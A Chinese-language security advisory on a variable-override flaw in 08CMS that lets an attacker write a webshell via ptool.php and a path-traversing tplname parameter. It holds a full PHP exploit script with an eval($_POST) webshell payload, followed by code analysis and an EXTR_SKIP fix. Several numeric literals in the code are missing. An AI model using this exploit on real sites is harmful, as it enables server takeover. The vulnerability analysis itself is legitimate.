08CMS Variable Override Write Arbitrarily WEBSHELL Into Arbitrarily Path

时间:2023-03-08 20:33:38
08CMS Variable Override Write Arbitrarily WEBSHELL Into Arbitrarily Path

目录

. 漏洞描述

. 漏洞触发条件

. 漏洞影响范围

. 漏洞代码分析

. 防御方法

. 攻防思考

1. 漏洞描述

简单描述这个漏洞

. /include/general.inc.php

//本地变量注册

foreach(array('_POST','_GET') as $_request)

{

    foreach($$_request as $k => $v)

    {

        $k{} != '_' && $$k = maddslashes($v);

    }

}

/*

这里实现了模拟GPC功能,将用户输入的GET、POST数据中的变量注册到本地代码空间中,导致攻击者理论上可以向应用程序"注入"任意的变量值

*/

. 通过本地变量覆盖,黑客可以控制目标应用程序将要进行的写文件操作,向网站目录下的任意位置写入任意文件

2. 漏洞触发条件

0x1: 攻击流

. 上传一个包含WEBSHELL的非PHP文件

/*

/tools/ptool.php

..

$cf = M_ROOT.'./dynamic/stats/aclicks.cac';

$ct = M_ROOT.'./dynamic/stats/aclicks_time.cac';

..

if(@$fp = fopen($cf,'a'))

{

    fwrite($fp,"$aid");

    fclose($fp);

    ..

通过注入$aid,利用程序的本地变量覆盖漏洞,向/dynamic/stats/aclicks.cac写入WEBSHELL代码

$exp = /tools/ptool.php?aid=<?php eval($_POST[a]);?>

*/

. 在第二个变量覆盖攻击点,传入这个文件路径(将要被打开的文件路径):

$exp1 = /index.php?tplname=../../dynamic/stats/aclicks.cac

. 程序打开/dynamic/stats/aclicks.cac,并重新写入到"/dynamic/stats/aclicks.cac.php"中,完成GETSHELL

0x2: POC

<?php

/*

    exp:        index.php?tplname=../../dynamic/stats/aclicks.cac

    汽车CMS Shell:    /dynamic/tplcache/common/....dynamicstatsaclicks.cac.php

    装修CMS Shell    /dynamic/dynamic/stats/aclicks.cac.php

*/

//$exp = /tools/ptool.php?aid=<?php eval($_POST[a]);?>

$exp = '/tools/ptool.php?aid=%3C%3Fphp%20eval%28%24_POST%5Ba%5D%29%3B%3F%3E';

//$exp1 = /index.php?tplname=../../dynamic/stats/aclicks.cac

$exp1 = '/index.php?tplname=..%2f..%2fdynamic%2fstats%2faclicks.cac';

if ($argc <  )

{

print_r('

+---------------------------------------------------------------------------+

 [+] php '.$argv[0].' [url]www.08sec.com[/url]

+---------------------------------------------------------------------------+

');

    exit;

}

error_reporting(E_ERROR);

set_time_limit();

$host = $argv[];

go($host);

function go ($host)

{

    global $exp,$exp1;

    $re = Send ($host,$exp);

    stripos($re, "MySQL") >  ? Send ($host, $exp) : ""

    $re = Send ($host, $exp1) && stripos($re, "aclicks.cac") >  ? exit(" + Exploit Success!rn + http://$host/template/dynamic/stats/aclicks.cac.phprn") : exit(" - Exploit Failed!n");

}

function Send($host,$url)

{

    $data = "GET $url  HTTP/1.1rn";

    $data .= "Host: $hostrn";

    $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 2000) Opera 6.03 [en]rn";

    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn";

    $data .= "Content-Type: application/x-www-form-urlencodedrn";

    $data .= "Accept-Language: en-usrn";

    $data .= "Connection: Closernrn";

    $fp = @fsockopen($host, );

    if (!$fp)

    {

        die("[-] Connect to host Errorrn");

    }

    fwrite($fp, $data);

    $back = '';

    while (!feof($fp))

    {

        $back .= fread($fp, );

    }

    fclose($fp);

    return $back;

}

?>

Relevant Link:

http://www.unhonker.com/bug/1390.html

3. 漏洞影响范围

08CMS全部商业版

4. 漏洞代码分析

本地变量注册实现代码

/include/general.inc.php

aaarticlea/png;base64,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" alt="" />

/index.php

include_once dirname(__FILE__).'/include/general.inc.php';

include_once M_ROOT.'./include/common.fun.php';

if_siteclosed();

mobile_open() || message('手机版尚未开放');

/*

function un_virtual($str)

{

    ......

    $str = str_replace(array('/','-'),array('&','='),$str); 把 / 和 - 替换成 & 和 =

    ......

    return $str;

}

parse_str()把查询字符串解析到变量中,保存在变量$temparr中

*/

parse_str(un_virtual($_SERVER['QUERY_STRING']), $temparr);

... 

$_da = array();

if(!$cnstr)

{

    //$tplname这个在这里定义的了,相当于被初始化了

    $tplname = $_ismobile ? $o_index_tpl : $hometpl ;

    $_da['rss'] = $cms_abs.'rss.php';

    $_da += $temparr; // $_da= $_da+$temparr

    unset($temparr);//销毁变量

    //变量覆盖,这样我们可以控制了$tplname这个变量,即对它重新覆盖

    extract($_da,EXTR_OVERWRITE);

    //这个tpl_refresh函数就是漏洞利用的关键点

    tpl_refresh($tplname);

    ...

/include/refresh.fun.php

function tpl_refresh($tplname)

{

    global $templatedir,$debugtag;

    $tdir = M_ROOT."template/$templatedir/"; 

    //$tplname可以由攻击者控制,所以$cacf也等同于被攻击者控制

    $cacf = $tdir.'pcache/'. $tplname.'.php';

    if(file_exists($x = $tdir."function/utags.fun.php"))

    {

    include_once $x;

    }

    mmkdir($cacf,,);

    if($debugtag || !file_exists($cacf))

    {

    //打开文件,返回内容

    $str = load_tpl($tplname);

    $tpl = @file2str(M_ROOT."template/$templatedir/".$tplname);  //file2str这个是打开文件的函数

    $rt && $tpl = preg_replace("/{tpl\$(.+?)}/ies", "rtagval('\1','$rt')",$tpl); 过滤 

        $str = preg_replace("/<\?(?!php\s|=|\s)/i", '<?='<?'?>', $str);

        $str = preg_replace("/<!--{(.+?)}-->/s", "{\1}", $str);

        breplace($str,'');

        nreplace($str);

        quit_refresh_var();

        $str = tpl_basecode($str);

    /*

    漏洞的关键,在这里

    1. $str: 攻击者可控制,这是一个.cac文件的内容,攻击者可以通过另一个变量覆盖向服务器写入一个.cac的WEBSHELL

    2. $cacf: 攻击者可控制,攻击者传入的参数是一个非PHP文件路径(.cac文件),这个文件也是真实存在的,可以通过另一个变量注入上传一个.cac文件,同时,程序在末尾拼接了".php",使其成为写一个PHP文件

    从结果上来看,相当于进行了一次.cac到.php的后缀重命名处理

    */

        str2file($str, $cacf);

    }

    unset($str,$tdir,$cacf);

}

5. 防御方法

/index.php

if(!$cnstr)

{

    //$tplname这个在这里定义的了,相当于被初始化了

    $tplname = $_ismobile ? $o_index_tpl : $hometpl ;

    $_da['rss'] = $cms_abs.'rss.php';

    $_da += $temparr; // $_da= $_da+$temparr

    unset($temparr);//销毁变量

    /*

    如果对应变量已经存在,则不进行覆盖操作

    */

    extract($_da, EXTR_SKIP);

    tpl_refresh($tplname);

    ...

6. 攻防思考

防御变量覆盖的防御思路

. 重新运行一次原始的代码逻辑,将被覆盖的变量再赋值回原始的值

. 在本地变量注册的入口处对关键字进行检测

Copyright (c) 2014 LittleHann All rights reserved